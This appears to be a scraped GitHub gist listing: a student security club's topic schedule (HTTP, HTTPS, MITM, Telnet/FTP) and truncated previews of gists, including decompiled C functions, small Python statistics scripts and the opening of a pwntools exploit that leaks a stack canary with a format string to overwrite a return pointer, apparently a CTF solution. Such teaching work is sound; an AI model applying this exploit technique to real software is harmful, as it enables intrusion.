-
HTTP Traffic #[what is http, uses, form manually using netcat] --> Aman sir IIIrd year
-
HTTPS Traffic #[difference between HTTP and HTTPS, traffic on wireshark, ncat to form a ssl connection] --> Aman sir III year
-
HTTP headers --> (Akansha & Aman sir Both partially )
-
MITM (intro, wireshark or some other framework, dos) --> Chirag IInd
-
Telnet, FTP Intro #[client view only] --> Utkarsh Pranav & Harsh sir IInd & IIIrd
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* process(char*) */ | |
void process(char *param_1) | |
{ | |
undefined *puVar1; | |
int iVar2; | |
size_t sVar3; | |
uint uVar4; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* MobileMouseSession(void*) */ | |
undefined4 MobileMouseSession(void *param_1) | |
{ | |
int __fd; | |
undefined4 uVar1; | |
size_t __n; | |
ssize_t sVar2; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void main(undefined4 param_1,undefined4 param_2) | |
{ | |
int *piVar1; | |
char *pcVar2; | |
int iVar3; | |
allocator *paVar4; | |
SessionContext *pSVar5; | |
undefined4 uVar6; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import math | |
def mul(x, y): | |
xy = [] | |
for a,b in zip(x,y): | |
xy.append(a*b) | |
return xy | |
def total(arr): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import math | |
def mul(x, y): | |
xy = [] | |
for a,b in zip(x,y): | |
xy.append(a*b) | |
return xy | |
def total(arr): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import math | |
def mean(xf, f): | |
return xf/f | |
def mul(arr1, arr2): | |
mul_arr = [] | |
for i in range(0, len(arr1)): | |
mul_arr.append(arr1[i]*arr2[i]) | |
return mul_arr |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from pwn import * | |
context.arch = 'i386' | |
''' | |
we saw that there is a format string vulnerability. so, it is easy to get the stack cookie value and add it in a proper way to | |
successfully over write the value of return pointer. | |
''' | |
canary_format_str = "%31$p" # format string for canary. | |
win = p32(0x08049236) # win function |